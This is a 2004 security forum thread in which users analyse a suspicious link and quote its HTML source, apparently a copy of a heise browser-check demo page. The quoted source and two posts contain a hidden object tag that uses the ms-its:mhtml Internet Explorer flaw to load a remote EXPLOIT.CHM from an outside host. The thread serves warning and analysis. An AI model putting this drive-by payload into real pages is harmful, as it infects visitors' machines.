AdmiralB
Apr 11 2004, 09:46 AM
VIRUS
CAREFUL
hXXp://people.freenet.de/gangstah/cs_lamer.txt/
nuorder
Apr 11 2004, 10:47 AM
looks like it might be a chm or flash IE exploit
but it didnt work on my pc so i cant be sure
maybe u should examine this part
<object
data="ms-its:mhtml:file://C:\foo.mhtml!http://people.freenet.de/gangstah//EXPLOIT.CHM::exploit.htm"
type="text/x-scriptlet"
style="visibility:hidden">
epi
Apr 11 2004, 10:51 AM
| QUOTE |
<html>
<head>
<!-- Site Navigation Bar -->
<link rel="contents" title="heise Security" href="/security/">
<link rel="chapter" title="News" href="/security/news/">
<link rel="section" title="News:7-Tage-Alerts" href="/security/news/alerts.shtml">
<link rel="section" title="News:7-Tage-News" href="/security/news/">
<link rel="section" title="News:Archiv" href="/security/news/archiv/2003/">
<link rel="chapter" title="Hintergrund" href="/security/artikel/">
<link rel="section" title="Hintergrund:BSI-Info" href="/security/artikel/bsi/">
<link rel="section" title="Hintergrund:Know-how" href="/security/artikel/knowhow/">
<link rel="section" title="Hintergrund:Kommentare" href="/security/artikel/kommentare/">
<link rel="section" title="Hintergrund:Praxis" href="/security/artikel/praxis/">
<link rel="section" title="Hintergrund:Produkte" href="/security/artikel/produkte/">
<link rel="chapter" title="Foren" href="/security/foren/go.shtml">
<link rel="section" title="Foren:Desktopsicherheit" href="/security/foren/go.shtml?list=1&forum_id=44157">
<link rel="section" title="Foren:Firewall, VPN & IDS" href="/security/foren/go.shtml?list=1&forum_id=44153">
<link rel="section" title="Foren:heise Security" href="/security/foren/go.shtml?list=1&forum_id=44159">
<link rel="section" title="Foren:Penetration Tests" href="/security/foren/go.shtml?list=1&forum_id=44154">
<link rel="section" title="Foren:Politik und Gesellschaft" href="/security/foren/go.shtml?list=1&forum_id=44158">
<link rel="section" title="Foren:Schwachstellen" href="/security/foren/go.shtml?list=1&forum_id=44155">
<link rel="section" title="Foren:Serversicherheit" href="/security/foren/go.shtml?list=1&forum_id=44156">
<link rel="section" title="Foren:Verschlüsselung" href="/security/foren/go.shtml?list=1&forum_id=44716">
<link rel="section" title="Foren:Viren & Würmer" href="/security/foren/go.shtml?list=1&forum_id=44152">
<link rel="chapter" title="Dienste" href="/security/dienste/">
<link rel="section" title="Dienste:Anti-Virus" href="/security/dienste/antivirus/">
<link rel="section" title="Dienste:Browsercheck" href="/security/dienste/browsercheck/">
<link rel="section" title="Dienste:IT's secure" href="/security/dienste/itssecure/">
<link rel="section" title="Dienste:Krypto-Kampagne" href="/security/dienste/pgp/">
<link rel="section" title="Dienste:Tools" href="/security/tools/">
<link rel="bookmark" type="text/html" title="heise online" href="http://www.heise.de">
<link rel="bookmark" type="text/html" title="c't" href="http://www.ctmagazin.de">
<link rel="bookmark" type="text/html" title="iX" href="http://www.ix.de">
<link rel="bookmark" type="text/html" title="Technology Review" href="http://www.technology-review.de">
<link rel="bookmark" type="text/html" title="Telepolis" href="http://www.telepolis.de">
<link rel="bookmark" type="text/html" title="heise mobil" href="http://www.heisemobil.de">
<link rel="bookmark" type="text/html" title="heise Security" href="http://www.heisec.de">
<link rel="bookmark" type="text/html" title="c'tTV" href="http://www.cttv.de">
<link rel="bookmark" type="text/html" title="heise jobs" href="http://www.heisejobs.de">
<link rel="bookmark" type="text/html" title="heise Kiosk" href="http://www.heise.de/kiosk/">
<link rel="bookmark" type="text/html" title="Heise Medien Gruppe" href="http://www.heise-medien.de">
<link rel="copyright" title="Heise Zeitschriften Verlag" href="/security/impressum/">
<link rel="start" title="Start" href="/security/">
<link rel="search" title="Suchen" href="/security/suche.shtml">
<link rel="help" title="Hilfe" href="/security/faq/">
<link rel="author" title="Kontakt" href="mailto:red%40heisec.de?subject=heise%20Security">
<link rel="home" title="home:heise online" href="/">
<link rel="alternate" type="application/rss+xml" title="RDF-Datei" href="http://www.heise.de/security/news/news.rdf">
<link rel="first" title="first:News" href="/security/news/">
<link rel="last" title="last:Dienste" href="/security/dienste/">
<!-- Allgemeines Standard-Stylesheet -->
<link href="/stil/standard.css" rel="stylesheet" type="text/css" media="screen, projection">
<!-- heisec Standard-Stylesheet -->
<link href="/stil/security/standard.css" rel="stylesheet" type="text/css" media="screen, projection">
<!-- Site Navigation Bar News-Meldungen-->
<!-- Site Navigation Bar und Stylesheets fuer Unterbereiche -->
<link rel="up" title="up:heise Security" href="/security/">
<link rel="prev" title="prev:Foren" href="/security/foren/go.shtml">
<link rel="next" title="next:News" href="/security/news/">
<link href="/stil/security/dienste.css" rel="stylesheet" type="text/css" media="screen, projection">
<!-- Allgemeines Druck-Stylesheet -->
<link href="/stil/drucken.css" rel="stylesheet" type="text/css" media="print">
<!-- heisec Druck-Stylesheet -->
<link href="/stil/security/drucken.css" rel="stylesheet" type="text/css" media="print">
<!-- Seitenname -->
<title></title>
<!-- Keywords, Description -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="keywords" content="heise Security, heise online, c't, iX, Technology Review, Telepolis, heise mobil, Newsticker">
<meta name="description" content="heise Security">
<!-- Staendige Aktualisierung -->
<!-- Favicon-->
<link href="/favicon.ico" rel="shortcut icon">
<!-- nicht in Frames-->
<base target="_top">
</head>
<!-- Body -->
<body bgcolor="#FFFFFF" text="#000000" link="#003399" vlink="#666666" alink="#3366cc"
leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<!-- allgemeine obere Navigation -->
<p>
Please wait...<p align="center"> </p>
<p align="center">
<object
data="ms-its:mhtml:file://C:\foo.mhtml!http://people.freenet.de/gangstah//EXPLOIT.CHM::exploit.htm"
type="text/x-scriptlet"
style="visibility:hidden">
</HEISETEXT>
</td>
</tr>
</table>
</td>
<td class="druck"><img src="/icons/ho/1pix.gif" width="1" height="1" hspace="5" alt=""></td>
<!-- Skyscraper -->
<td valign="top" class="druck"><skyscraper><table border="0">
<tr align="center">
<td><script Language="Javascript">
var shockwaveFile="http://adserv.quality-channel.de/images/HE40X720XSKY1/kw13/sym_12_esm.swf";
var alternateGif="http://adserv.quality-channel.de/images/HE40X720XSKY1/kw13/sym_12_esm.gif";
function sym_12_esm(){window.open("http://www.heise.de/RealMedia/ads/click_lx.ads/www.heise.de/security/dienste/955925275/Left1/HE40X720XSKY1/HE40X720XSKY1_60.html/38322e38332e3230352e313536?_RM_REDIR_=adserv.quality-channel.de/RealMedia/ads/secure2.cgi?enterprisesecurity.symantec.de/products/products.cfm~~QM~~productid~~EQ~~111~~AMP~~EI")};
var ver = 0;
var ShockMode = 0;
var plug = 0;
ver = parseInt(navigator.appVersion.substring(0,1));
function checkNetscape(){
if(navigator.appName == "Netscape" && (navigator.userAgent.indexOf("Win")>=0 || navigator.userAgent.indexOf("Macintosh")>=0) && navigator.userAgent.indexOf("Opera") == -1){
for(i=0;i<navigator.plugins.length;i++){
if((navigator.plugins[i].description.indexOf("Flash 5.0") >= 0) || (navigator.plugins[i].description.indexOf("Flash 6.0") >= 0)){
plug = 1;
break;
}
}
}
else if (navigator.userAgent && navigator.userAgent.indexOf("MSIE")>=0 && navigator.userAgent.indexOf("Win")>=0 && navigator.userAgent.indexOf("Opera") == -1){
document.writeln('<script LANGUAGE=VBScript\> ');
document.writeln('on error resume next ');
document.writeln('ShockMode = (IsObject(CreateObject("ShockwaveFlash.ShockwaveFlash.5"))) ');
document.write("</SCR" + "IPT>");
if(ShockMode)
plug = 1;
}
}
if(ver > 2) checkNetscape();
if(plug == 1){
document.write('<EMBED SRC="'+shockwaveFile+'" TYPE="application/x-shockwave-flash" WIDTH="137" HEIGHT="800" PLAY="true" LOOP="true" WMODE="opaque" QUALITY="autohigh" PLUGINSPACE="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=Shockwave"></EMBED>');
}
else{
document.write('<a href="http://www.heise.de/RealMedia/ads/click_lx.ads/www.heise.de/security/dienste/955925275/Left1/HE40X720XSKY1/HE40X720XSKY1_60.html/38322e38332e3230352e313536?_RM_REDIR_=adserv.quality-channel.de/RealMedia/ads/secure2.cgi?enterprisesecurity.symantec.de/products/products.cfm~~QM~~productid~~EQ~~111~~AMP~~EI" target="_blank"><img src="'+alternateGif+'" WIDTH="137" HEIGHT="800" border="0" ALT="Hier klicken!"></a>');
}
</SCRIPT><img SRC="http://www.heise.de/RealMedia/ads/adstream_lx.ads/www.heise.de/security/dienste/955925275/Left1/HE40X720XSKY1/HE40X720XSKY1_60.html/38322e38332e3230352e313536?_RM_EMPTY_" WIDTH="1" HEIGHT="1"></td>
</tr>
</table>
</skyscraper></td>
</tr>
</table>
</td>
</tr>
</table>
<!-- IVW-Pixel -->
<img src="/ivw-bin/ivw/CP/security/dienste/browsercheck/demos/ie/mhtml/boom.shtml" width="1" height="1" alt="">
<img src="http://heise.ivwbox.de/cgi-bin/ivw/CP/security_dienste;/security/dienste/browsercheck/demos/ie/mhtml/boom.shtml?r=(none)" width="1" height="1" alt="">
<!-- SZMFRABO -->
<br>
<table border="0" cellspacing="0" cellpadding="0" width="100%">
<tr>
<td bgcolor="#999999"><img src="/icons/ho/1pix.gif" width="1" height="1" hspace="375" alt=""></td>
</tr>
<tr>
<td bgcolor="#eeeeee">
<table cellpadding="2" cellspacing="2" border="0" width="100%">
<tr>
<td><span class="navi_unten">Copyright © 2004 </span><a href="http://www.heise-medien.de/zeitschriften/" target="_blank" class="navi_unten">Heise Zeitschriften Verlag</a></td>
<td align="right" nowrap>
<div class="druck">
<a href="/privacy/" class="navi_unten">Datenschutzhinweis</a>
<a href="/security/impressum/" class="navi_unten">Impressum</a>
<a href="/security/impressum/" class="navi_unten">Kontakt</a>
<a href="/security/suche.shtml" class="navi_unten">Suche</a>
<a href="/security/faq/" class="navi_unten">FAQ</a>
</div>
</td>
</tr>
</table>
</td>
</tr>
</table>
</body>
</html>
</p>
</p>
|
MsMittens
Apr 11 2004, 11:05 AM
There are a few interesting lines but I think these ones stand out:
| QUOTE |
<object
data="ms-its:mhtml:file://C:\foo.mhtml!http://people.freenet.de/gangstah//EXPLOIT.CHM::exploit.htm"
type="text/x-scriptlet"
style="visibility:hidden"> |
This
link should give you more info on the "exploit" (if you haven't heard of it before)
dr0zaxx
Apr 12 2004, 06:16 AM
Hi guys, i hope this information by me is very useful to all of you. please take your time to read it
no flaming please..thanks...since i am still a trial members and i cant attach files, you can view the file from my website. thanks.
url is below
WALKTHROUGH_OF_VIRUS.pdf 
tstngry
Apr 12 2004, 07:15 AM
I found your information very interesting, I have read other of your .pdf information files and i liked them also. Keep up the good work. People really need this info wether the admit it or not.
dr0zaxx
Apr 12 2004, 07:51 AM
| QUOTE |
tstngry Posted on Apr 12 2004, 07:15 AM
I found your information very interesting, I have read other of your .pdf information files and i liked them also. Keep up the good work. People really need this info wether the admit it or not. |
Heh..heh..heh..no problem. glad to be of any help...have to post something useful once in a while else GSO might remove my account!!!
epi
Apr 13 2004, 06:52 AM
nice pdf dro
an interesting rundown of what is happening... and all in easy pdf format
Player_0
Apr 20 2004, 04:39 AM
The CHM sounds like an internet explorer exploit which I think was fixed in the recent Microsoft patches. The OBJ exploit might have been fixed too with some others. Dont use ie =P
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.
